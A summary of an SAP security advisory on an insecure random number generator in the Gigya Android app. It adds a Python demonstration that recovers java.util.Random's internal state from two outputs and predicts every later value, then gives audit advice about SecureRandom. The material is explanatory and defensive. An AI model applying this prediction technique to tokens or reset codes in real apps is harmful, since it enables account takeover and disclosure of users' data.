SAP takes the security of its large product portfolio seriously and releases security fixes for
vulnerabilities reported by external researchers and by its customers on the second Tuesday of every month (SAP Security Patch Day).
SAP Note 3248384 was released on 11.10.2022 and deals with "[CVE-2022-41210] Information Disclosure Vulnerability in SAP Customer Data Cloud (Gigya)".
We advise you to follow the instructions in the note to resolve this issue, which is classified as an insufficient security function with medium potential for exploitation, in component CEC-PRO-GIY.
According to the SAP Security Advisory team, no workaround exists. It is advisable to implement the correction as part of the monthly patch process.
Risk specification: The Gigya mobile app (Android) uses an insecure random number generator, which makes it easy for an attacker to predict future random numbers. Because values drawn from such a generator may be used to protect user data or settings, this can lead to information disclosure and to the modification of certain user settings.
The affected component has been upgraded and now generates properly random numbers.
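To show why a predictable generator is a real risk rather than a theoretical one, the following is an added example (not code from the SAP note, the Gigya app or SAP). The note does not say which generator the app used; this example assumes java.util.Random, the common insecure choice on Android, whose 48-bit linear congruential algorithm is public. It re-implements that algorithm in Python, observes two consecutive nextInt() outputs, brute-forces the 16 hidden state bits and then predicts every following output. The seed value and the number of observed outputs are the example's own choices.

```python
"""Predicting java.util.Random output from two observed values.

Added example, not from the SAP note. The generator in the Gigya app is
not named by the note; java.util.Random is assumed here.
java.util.Random is a 48-bit LCG:
    state = (state * 0x5DEECE66D + 0xB) mod 2^48
    nextInt() returns the top 32 bits of the new state as a signed int.
Only 32 of 48 state bits leak per output, so an attacker who sees two
consecutive outputs brute-forces the 16 unseen bits (65536 candidates).
"""
from typing import List, Optional

MULT = 0x5DEECE66D
ADD = 0xB
MASK = (1 << 48) - 1


def _to_signed32(x: int) -> int:
    """Interpret the low 32 bits of x as a Java int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


class JavaRandom:
    """Re-implementation of java.util.Random.nextInt() (no-argument form)."""

    def __init__(self, seed: int):
        # Java XORs the seed with the multiplier on construction.
        self.state = (seed ^ MULT) & MASK

    @classmethod
    def from_state(cls, state: int) -> "JavaRandom":
        """Build a generator positioned at a known internal state."""
        r = cls.__new__(cls)
        r.state = state & MASK
        return r

    def next_int(self) -> int:
        self.state = (self.state * MULT + ADD) & MASK
        return _to_signed32(self.state >> 16)  # next(32): top 32 of 48 bits


def recover_state(out1: int, out2: int) -> Optional[int]:
    """Given two consecutive nextInt() outputs, recover the 48-bit state.

    out1 fixes the top 32 bits of the state that produced it; the low 16
    bits are tried exhaustively and confirmed against out2. Returns the
    state *after* out2 was produced, or None if no candidate matches.
    """
    top = out1 & 0xFFFFFFFF
    for low in range(1 << 16):
        cand = (top << 16) | low
        nxt = (cand * MULT + ADD) & MASK
        if _to_signed32(nxt >> 16) == out2:
            return nxt
    return None


def predict_next(out1: int, out2: int, count: int = 3) -> List[int]:
    """Predict the next `count` nextInt() values after two observed ones."""
    state = recover_state(out1, out2)
    if state is None:
        return []
    clone = JavaRandom.from_state(state)
    return [clone.next_int() for _ in range(count)]


def demo(seed: int = 0x1234) -> tuple:
    """Victim draws values; attacker sees the first two and predicts the rest.

    The seed is an arbitrary constructed value for the demonstration.
    Returns (actual_values, predicted_values); they are equal.
    """
    victim = JavaRandom(seed)
    observed = [victim.next_int() for _ in range(2)]
    actual = [victim.next_int() for _ in range(3)]
    predicted = predict_next(observed[0], observed[1], 3)
    return actual, predicted


if __name__ == "__main__":
    actual, predicted = demo()
    print("victim produced :", actual)
    print("attacker guessed:", predicted)
```

The fix SAP describes (a properly random generator) corresponds on Android to java.security.SecureRandom, whose output is not a function of a small recoverable state, so the brute force above has nothing to recover. When auditing an app for this class of bug, search for java.util.Random (and Math.random()) anywhere a value is used as a token, nonce, identifier or reset code, not only in obviously cryptographic code.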
The advisory is valid for
- 6.7 [CVE-2022-35295] Privilege Escalation Vulnerability in SAPOSCOL on Unix
- 6.5 Information Disclosure vulnerability in SAP Business Client
- 6.3 [CVE-2021-21472] Server password not set during installation of SAP NetWeaver Master Data Management 7.1
- 5.4 [CVE-2020-6178] Insufficient session expiration in SAP Enable Now Manager
- 4.9 [CVE-2022-41209] Information Disclosure Vulnerability in SAP Customer Data Cloud (Gigya)